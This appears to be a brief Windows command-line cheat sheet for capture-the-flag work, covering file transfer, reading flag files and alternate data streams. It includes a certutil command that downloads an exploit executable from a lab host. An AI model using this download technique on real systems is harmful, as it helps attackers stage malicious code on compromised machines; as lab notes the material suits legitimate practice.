Skip to content

CMD

file transfer

certutil -urlcache -f http://10.10.10.5/exploit.exe exploit.exe

read file

type flag.txt

show and read alternate data streams

dir /R
more < flag.txt:root.txt:$DATA